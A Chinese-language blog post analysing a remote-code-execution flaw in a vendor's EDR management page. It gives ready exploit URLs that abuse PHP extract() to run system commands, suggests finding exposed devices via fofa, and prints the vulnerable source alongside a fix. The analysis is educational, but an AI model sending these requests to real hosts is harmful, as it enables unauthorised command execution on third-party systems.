<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 4.2.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"quinzhi.github.io","root":"/","scheme":"Muse","version":"7.7.2","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":true},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="0x01 前言hw第一天，坊间开始流传某服的EDR爆出漏洞。网上一搜就有老哥发了poc，直接get方法rce，复现无门槛，作为爱凑热闹的菜鸡，当然要试试。 0x02 背景什么是EDREDR即终端检测响应平台，从官网简介中的【支持全类型终端的统一管理与集中策略下发】来看，EDR是一个内部终端管理平台，而这次的漏洞正存在于平台管理页面 0x03 POC1https:&#x2F;&#x2F;XXX:xx">
<meta property="og:type" content="article">
<meta property="og:title" content="某服EDR_RCE">
<meta property="og:url" content="https://quinzhi.github.io/2020/08/18/%E6%9F%90%E6%9C%8DEDR-RCE/index.html">
<meta property="og:site_name" content="Quin&#39;s site">
<meta property="og:description" content="0x01 前言hw第一天，坊间开始流传某服的EDR爆出漏洞。网上一搜就有老哥发了poc，直接get方法rce，复现无门槛，作为爱凑热闹的菜鸡，当然要试试。 0x02 背景什么是EDREDR即终端检测响应平台，从官网简介中的【支持全类型终端的统一管理与集中策略下发】来看，EDR是一个内部终端管理平台，而这次的漏洞正存在于平台管理页面 0x03 POC1https:&#x2F;&#x2F;XXX:xx">
<meta property="og:locale" content="en_US">
<meta property="article:published_time" content="2020-08-18T06:34:14.000Z">
<meta property="article:modified_time" content="2020-08-18T10:13:42.491Z">
<meta property="article:author" content="Quin">
<meta property="article:tag" content="RCE">
<meta name="twitter:card" content="summary">

<link rel="canonical" href="https://quinzhi.github.io/2020/08/18/%E6%9F%90%E6%9C%8DEDR-RCE/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true
  };
</script>

  <title>某服EDR_RCE | Quin's site</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta custom-logo">
      <div class="site-meta-headline">
        <a>
          <img class="custom-logo-image" src="/images/apple-touch-icon-next.png" alt="Quin's site">
        </a>
      </div>

    <div>
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Quin's site</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>


<nav class="site-nav">
  
  <ul id="menu" class="menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-fw fa-home"></i>Home</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-fw fa-th"></i>Categories</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-fw fa-archive"></i>Archives</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>Search
        </a>
      </li>
  </ul>

</nav>
  <div class="site-search">
    <div class="popup search-popup">
    <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocorrect="off" autocapitalize="off"
           placeholder="Searching..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result"></div>

</div>
<div class="search-pop-overlay"></div>

  </div>
</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content">
            

  <div class="posts-expand">
      
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block " lang="en">
    <link itemprop="mainEntityOfPage" href="https://quinzhi.github.io/2020/08/18/%E6%9F%90%E6%9C%8DEDR-RCE/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.jpg">
      <meta itemprop="name" content="Quin">
      <meta itemprop="description" content=""Just for fun"">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Quin's site">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          某服EDR_RCE
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              <span class="post-meta-item-text">Posted on</span>
              

              <time title="Created: 2020-08-18 14:34:14 / Modified: 18:13:42" itemprop="dateCreated datePublished" datetime="2020-08-18T14:34:14+08:00">2020-08-18</time>
            </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              <span class="post-meta-item-text">In</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/" itemprop="url" rel="index"><span itemprop="name">漏洞分析</span></a>
                </span>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="0x01-前言"><a href="#0x01-前言" class="headerlink" title="0x01 前言"></a>0x01 前言</h1><p>hw第一天，坊间开始流传某服的EDR爆出漏洞。网上一搜就有老哥发了poc，<br>直接get方法rce，复现无门槛，作为爱凑热闹的菜鸡，当然要试试。</p>
<h1 id="0x02-背景"><a href="#0x02-背景" class="headerlink" title="0x02 背景"></a>0x02 背景</h1><h2 id="什么是EDR"><a href="#什么是EDR" class="headerlink" title="什么是EDR"></a>什么是EDR</h2><p>EDR即终端检测响应平台，从官网简介中的【支持全类型终端的统一管理与集中策略下发】来看，EDR是一个内部终端管理平台，而这次的漏洞正存在于平台管理页面</p>
<h1 id="0x03-POC"><a href="#0x03-POC" class="headerlink" title="0x03 POC"></a>0x03 POC</h1><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">https:&#x2F;&#x2F;XXX:xx&#x2F;tool&#x2F;log&#x2F;c.php?strip_slashes&#x3D;system&amp;host&#x3D;ls</span><br></pre></td></tr></table></figure>

<p>从poc来看，问题出在c.php，不过这名字起的真像个后门</p>
<h1 id="0x04-复现"><a href="#0x04-复现" class="headerlink" title="0x04 复现"></a>0x04 复现</h1><h2 id="目标发现"><a href="#目标发现" class="headerlink" title="目标发现"></a>目标发现</h2><p>国内的设备发现自然首选fofa，直接搜索【某服】就能弹出某服EDR设备的搜索项，简单方便，比那些自己贴http指纹的不知道高到哪里去了。</p>
<h2 id="利用"><a href="#利用" class="headerlink" title="利用"></a>利用</h2><p>直接上poc，一发入魂，当然最重要的还是看看到底是什么在搞鬼</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">https:&#x2F;&#x2F;XXX:xx&#x2F;tool&#x2F;log&#x2F;c.php?strip_slashes&#x3D;system&amp;host&#x3D;more c.php</span><br></pre></td></tr></table></figure>
<p>浏览器渲染过的肯定不好看，右键查看源代码就方便扣出实际的c.php里的文件内容了</p>
<h1 id="0x05-漏洞分析"><a href="#0x05-漏洞分析" class="headerlink" title="0x05 漏洞分析"></a>0x05 漏洞分析</h1><p>c.php的内容如下：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br></pre></td><td class="code"><pre><span class="line">::::::::::::::</span><br><span class="line">c.php</span><br><span class="line">::::::::::::::</span><br><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * c.php</span></span><br><span class="line"><span class="comment"> * 查看ldb的日志</span></span><br><span class="line"><span class="comment"> * 支持正则表达式过滤，可以过滤文件以及每行日志</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"> </span><br><span class="line">call_user_func(<span class="function"><span class="keyword">function</span><span class="params">()</span> </span>&#123;</span><br><span class="line">    <span class="comment">/**</span></span><br><span class="line"><span class="comment">     * 编解码</span></span><br><span class="line"><span class="comment">     * <span class="doctag">@param</span> string $data 编解码数据</span></span><br><span class="line"><span class="comment">     * <span class="doctag">@return</span> string 返回编解码数据</span></span><br><span class="line"><span class="comment">     */</span></span><br><span class="line">    $code = <span class="function"><span class="keyword">function</span><span class="params">($data)</span> </span>&#123;</span><br><span class="line">        <span class="keyword">for</span> ($i = <span class="number">0</span>; $i &lt; strlen($data); ++$i) &#123;</span><br><span class="line">            $data[$i] = $data[$i] ^ <span class="string">'G'</span>;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">return</span> $data;</span><br><span class="line">    &#125;;</span><br><span class="line">    </span><br><span class="line">    <span class="comment">/**</span></span><br><span class="line"><span class="comment">     * 加密请求</span></span><br><span class="line"><span class="comment">     * <span class="doctag">@param</span> string $site  站点</span></span><br><span class="line"><span class="comment">     * <span class="doctag">@param</span> string $query 请求串</span></span><br><span class="line"><span class="comment">     * <span class="doctag">@return</span> string 返回请求URL</span></span><br><span class="line"><span class="comment">     */</span></span><br><span class="line">    $request = <span class="function"><span class="keyword">function</span><span class="params">($site, $query)</span> <span class="title">use</span><span class="params">(&amp;$code)</span> </span>&#123;</span><br><span class="line">        $path = base64_encode($code($query));</span><br><span class="line">        <span class="keyword">return</span> <span class="string">"$site/$path"</span>;</span><br><span class="line">    &#125;;</span><br><span class="line">    </span><br><span class="line">    <span class="comment">/**</span></span><br><span class="line"><span class="comment">     * 解密回复</span></span><br><span class="line"><span class="comment">     * <span class="doctag">@param</span> string $data 回复数据</span></span><br><span class="line"><span class="comment">     * <span class="doctag">@return</span> array 返回回复数据</span></span><br><span class="line"><span class="comment">     */</span></span><br><span class="line">    $response = <span class="function"><span class="keyword">function</span><span class="params">($data)</span> <span class="title">use</span><span class="params">(&amp;$code)</span> </span>&#123;</span><br><span class="line">        $ret = json_decode($data, <span class="keyword">true</span>);</span><br><span class="line">        <span class="keyword">if</span> (is_null($ret)) &#123;</span><br><span class="line">            $dec = $code(base64_decode($data));</span><br><span class="line">            $ret = json_decode($dec, <span class="keyword">true</span>);</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">return</span> $ret;</span><br><span class="line">    &#125;;</span><br><span class="line">    </span><br><span class="line">    <span class="comment">/**</span></span><br><span class="line"><span class="comment">     * 找到匹配的日志</span></span><br><span class="line"><span class="comment">     * <span class="doctag">@param</span> string $path 文件路径匹配</span></span><br><span class="line"><span class="comment">     * <span class="doctag">@param</span> string $item 日志项匹配</span></span><br><span class="line"><span class="comment">     * <span class="doctag">@param</span> string $topn TOP N </span></span><br><span class="line"><span class="comment">     * <span class="doctag">@param</span> string $host 主机</span></span><br><span class="line"><span class="comment">     * <span class="doctag">@return</span> array 返回匹配结果</span></span><br><span class="line"><span class="comment">     */</span></span><br><span class="line">    $collect = <span class="function"><span class="keyword">function</span><span class="params">($path, $item, $topn, $host)</span> <span class="title">use</span><span class="params">(&amp;$request, &amp;$response)</span> </span>&#123;</span><br><span class="line">        $path   = urlencode($path);</span><br><span class="line">        $item   = urlencode($item);</span><br><span class="line">        $result = file_get_contents($request(<span class="string">"http://127.0.0.1:8089"</span>, <span class="string">"op=ll&amp;host=$host&amp;path=$path&amp;item=$item&amp;top=$topn"</span>));</span><br><span class="line">        <span class="keyword">return</span> $response($result);</span><br><span class="line">    &#125;;</span><br><span class="line">    </span><br><span class="line">    <span class="comment">/**</span></span><br><span class="line"><span class="comment">     * 显示某个表单域</span></span><br><span class="line"><span class="comment">     * <span class="doctag">@param</span> array $info 表单域信息, array("name" =&gt; "xx", "value" =&gt; "xxx", "note" =&gt; "help");</span></span><br><span class="line"><span class="comment">     * <span class="doctag">@return</span></span></span><br><span class="line"><span class="comment">     */</span></span><br><span class="line">    $show_input = <span class="function"><span class="keyword">function</span><span class="params">($info)</span> </span>&#123;</span><br><span class="line">        extract($info);</span><br><span class="line">        $value = htmlentities($value);</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">"&lt;p&gt;&lt;font size=2&gt;$title: &lt;/font&gt;&lt;input type=\"text\" size=30 id=\"$name\" name=\"$name\" value=\"$value\"&gt;&lt;font size=2&gt;$note&lt;/font&gt;&lt;/p&gt;"</span>;</span><br><span class="line">    &#125;;</span><br><span class="line">    </span><br><span class="line">    <span class="comment">/**</span></span><br><span class="line"><span class="comment">     * 去掉反斜杠</span></span><br><span class="line"><span class="comment">     * <span class="doctag">@param</span> string $var 值</span></span><br><span class="line"><span class="comment">     * <span class="doctag">@return</span> string 返回去掉反斜杠的值</span></span><br><span class="line"><span class="comment">     */</span></span><br><span class="line">    $strip_slashes = <span class="function"><span class="keyword">function</span><span class="params">($var)</span> </span>&#123;</span><br><span class="line">        <span class="keyword">if</span> (!get_magic_quotes_gpc()) &#123;</span><br><span class="line">            <span class="keyword">return</span> $var;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">return</span> stripslashes($var);</span><br><span class="line">    &#125;;</span><br><span class="line"></span><br><span class="line">    <span class="comment">/**</span></span><br><span class="line"><span class="comment">     * 显示表单</span></span><br><span class="line"><span class="comment">     * <span class="doctag">@param</span> array $params 请求参数</span></span><br><span class="line"><span class="comment">     * <span class="doctag">@return</span></span></span><br><span class="line"><span class="comment">     */</span></span><br><span class="line">    $show_form = <span class="function"><span class="keyword">function</span><span class="params">($params)</span> <span class="title">use</span><span class="params">(&amp;$strip_slashes, &amp;$show_input)</span> </span>&#123;</span><br><span class="line">        extract($params);</span><br><span class="line">        $host  = <span class="keyword">isset</span>($host)  ? $strip_slashes($host)  : <span class="string">"127.0.0.1"</span>;</span><br><span class="line">        $path  = <span class="keyword">isset</span>($path)  ? $strip_slashes($path)  : <span class="string">""</span>;</span><br><span class="line">        $row   = <span class="keyword">isset</span>($row)   ? $strip_slashes($row)   : <span class="string">""</span>;</span><br><span class="line">        $limit = <span class="keyword">isset</span>($limit) ? $strip_slashes($limit) : <span class="number">1000</span>;</span><br><span class="line">        </span><br><span class="line">        <span class="comment">// 绘制表单</span></span><br><span class="line">        <span class="keyword">echo</span> <span class="string">"&lt;pre&gt;"</span>;</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">'&lt;form id="studio" name="studio" method="post" action=""&gt;'</span>;</span><br><span class="line">        $show_input(<span class="keyword">array</span>(<span class="string">"title"</span> =&gt; <span class="string">"Host "</span>,  <span class="string">"name"</span> =&gt; <span class="string">"host"</span>,  <span class="string">"value"</span> =&gt; $host,  <span class="string">"note"</span> =&gt; <span class="string">" - host, e.g. 127.0.0.1"</span>));</span><br><span class="line">        $show_input(<span class="keyword">array</span>(<span class="string">"title"</span> =&gt; <span class="string">"Path "</span>,  <span class="string">"name"</span> =&gt; <span class="string">"path"</span>,  <span class="string">"value"</span> =&gt; $path,  <span class="string">"note"</span> =&gt; <span class="string">" - path regex, e.g. mapreduce"</span>));</span><br><span class="line">        $show_input(<span class="keyword">array</span>(<span class="string">"title"</span> =&gt; <span class="string">"Row  "</span>,  <span class="string">"name"</span> =&gt; <span class="string">"row"</span>,   <span class="string">"value"</span> =&gt; $row,   <span class="string">"note"</span> =&gt; <span class="string">" - row regex, e.g. \s[w|e]\s"</span>));</span><br><span class="line">        $show_input(<span class="keyword">array</span>(<span class="string">"title"</span> =&gt; <span class="string">"Limit"</span>,  <span class="string">"name"</span> =&gt; <span class="string">"limit"</span>, <span class="string">"value"</span> =&gt; $limit, <span class="string">"note"</span> =&gt; <span class="string">" - top n, e.g. 100"</span>));</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">'&lt;input type="submit" id="button"&gt;'</span>;</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">'&lt;/form&gt;'</span>;</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">"&lt;/pre&gt;"</span>;</span><br><span class="line">    &#125;;</span><br><span class="line">    </span><br><span class="line">    <span class="comment">/**</span></span><br><span class="line"><span class="comment">     * 入口函数</span></span><br><span class="line"><span class="comment">     * <span class="doctag">@param</span> array $argv 配置参数</span></span><br><span class="line"><span class="comment">     * <span class="doctag">@return</span></span></span><br><span class="line"><span class="comment">     */</span></span><br><span class="line">    $main = <span class="function"><span class="keyword">function</span><span class="params">($argv)</span> </span></span><br><span class="line"><span class="function">        <span class="title">use</span><span class="params">(&amp;$collect)</span> </span>&#123;</span><br><span class="line">        extract($argv);</span><br><span class="line">        <span class="keyword">if</span> (!<span class="keyword">isset</span>($limit)) &#123;</span><br><span class="line">            <span class="keyword">return</span>;</span><br><span class="line">        &#125;</span><br><span class="line">        $result = $collect($path, $row, $limit, $host);</span><br><span class="line">        <span class="keyword">if</span> (!is_array($result)) &#123;</span><br><span class="line">            <span class="keyword">echo</span> $result, <span class="string">"\n"</span>;</span><br><span class="line">            <span class="keyword">return</span>;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">if</span> (!<span class="keyword">isset</span>($result[<span class="string">"success"</span>]) || $result[<span class="string">"success"</span>] !== <span class="keyword">true</span>) &#123;</span><br><span class="line">            <span class="keyword">echo</span> $result, <span class="string">"\n"</span>;</span><br><span class="line">            <span class="keyword">return</span>;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">foreach</span> ($result[<span class="string">"data"</span>] <span class="keyword">as</span> $host =&gt; $items) &#123;</span><br><span class="line">            $last = <span class="string">""</span>;</span><br><span class="line">            <span class="keyword">foreach</span> ($items <span class="keyword">as</span> $item) &#123;</span><br><span class="line">                <span class="keyword">if</span> ($item[<span class="string">"name"</span>] != $last) &#123;</span><br><span class="line">                    $last = $item[<span class="string">"name"</span>];</span><br><span class="line">                    <span class="keyword">echo</span> <span class="string">"\n[$host] -&gt; $last\n\n"</span>;</span><br><span class="line">                &#125;</span><br><span class="line">                <span class="keyword">echo</span> $item[<span class="string">"item"</span>], <span class="string">"\n"</span>;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;;</span><br><span class="line">    </span><br><span class="line">    set_time_limit(<span class="number">0</span>);</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">'&lt;html&gt;&lt;head&gt;&lt;meta http-equiv="Content-Type" Content="text/html; Charset=utf-8"&gt;&lt;/head&gt;'</span>;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">'&lt;body bgcolor="#e8ddcb"&gt;'</span>;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">"&lt;p&gt;&lt;b&gt;Log Helper&lt;/b&gt;&lt;/p&gt;"</span>;</span><br><span class="line">    $show_form($_REQUEST);</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">"&lt;pre&gt;"</span>;</span><br><span class="line">    $main($_REQUEST);</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">"&lt;/pre&gt;"</span>;  </span><br><span class="line">&#125;);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>其中关键代码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$show_form($_REQUEST);   <span class="comment">// $_REQUEST可以获取以POST方法和GET方法提交的数据</span></span><br></pre></td></tr></table></figure>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment">     * 显示表单</span></span><br><span class="line"><span class="comment">     * <span class="doctag">@param</span> array $params 请求参数</span></span><br><span class="line"><span class="comment">     * <span class="doctag">@return</span></span></span><br><span class="line"><span class="comment">     */</span></span><br><span class="line">    $show_form = <span class="function"><span class="keyword">function</span><span class="params">($params)</span> <span class="title">use</span><span class="params">(&amp;$strip_slashes, &amp;$show_input)</span> </span>&#123;    <span class="comment">// function use表示使用了匿名函数，从外部传入了自己定义的strip_slashes函数变量</span></span><br><span class="line">        extract($params);                                                   <span class="comment">// 这里传入了向url提交的数组，参数没有做处理</span></span><br><span class="line">        $host  = <span class="keyword">isset</span>($host)  ? $strip_slashes($host)  : <span class="string">"127.0.0.1"</span>;       <span class="comment">// 通过get参数传入了strip_slahes和host、path、row、limit都能覆盖掉</span></span><br><span class="line">        $path  = <span class="keyword">isset</span>($path)  ? $strip_slashes($path)  : <span class="string">""</span>;</span><br><span class="line">        $row   = <span class="keyword">isset</span>($row)   ? $strip_slashes($row)   : <span class="string">""</span>;</span><br><span class="line">        $limit = <span class="keyword">isset</span>($limit) ? $strip_slashes($limit) : <span class="number">1000</span>;</span><br></pre></td></tr></table></figure>
<p>php中extract会将传入的数组中的key作为变量名，value作为变量值导入到当前的符号表中。当某个变量已经存在时，可以通过设置第二个参数flag可以妥当处理。<br>但这里开发者没有考虑。使得自己定义的函数变量strip_slashes被get方法修改为system，然后修改传入的变量host值为系统命令即可任意RCE<br>extract的危害还是具体看实现，比如这里第一个关键点是<strong>传入extract的数组是受用户控制、没有过滤的、禁止覆盖同名变量的</strong>，<br>然后这个<strong>变量刚好被作为函数使用</strong>，最后又<strong>直接将执行结果echo出来</strong>，这样才是完整的利用链</p>
<h1 id="0x06-修复"><a href="#0x06-修复" class="headerlink" title="0x06 修复"></a>0x06 修复</h1><p>设置extract的flag参数防止变量值被修改</p>
<h1 id="0x07-后续"><a href="#0x07-后续" class="headerlink" title="0x07 后续"></a>0x07 后续</h1><p>难得接触某服的设备，既然来了就要多逛逛，也许还能扩大一下战果</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">https:&#x2F;&#x2F;XXX:xx&#x2F;tool&#x2F;log&#x2F;c.php?strip_slashes&#x3D;system&amp;host&#x3D;grep extract *.php</span><br></pre></td></tr></table></figure>


<h1 id="0x08-总结"><a href="#0x08-总结" class="headerlink" title="0x08 总结"></a>0x08 总结</h1><p>除了extract，php变量覆盖还有别的方法，由于是变量覆盖，因此是否能利用和造成的危害还是要具体情况具体分析。<br>一切用户输入都是不可预测的，凡是输入都要过滤处理，应该对参数中的system、phpinfo等敏感函数进行过滤</p>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/RCE/" rel="tag"># RCE</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2020/03/04/counting-sort/" rel="prev" title="计数排序">
      <i class="fa fa-chevron-left"></i> 计数排序
    </a></div>
      <div class="post-nav-item"></div>
    </div>
      </footer>
    
  </article>
  
  
  

  </div>


          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let activeClass = CONFIG.comments.activeClass;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
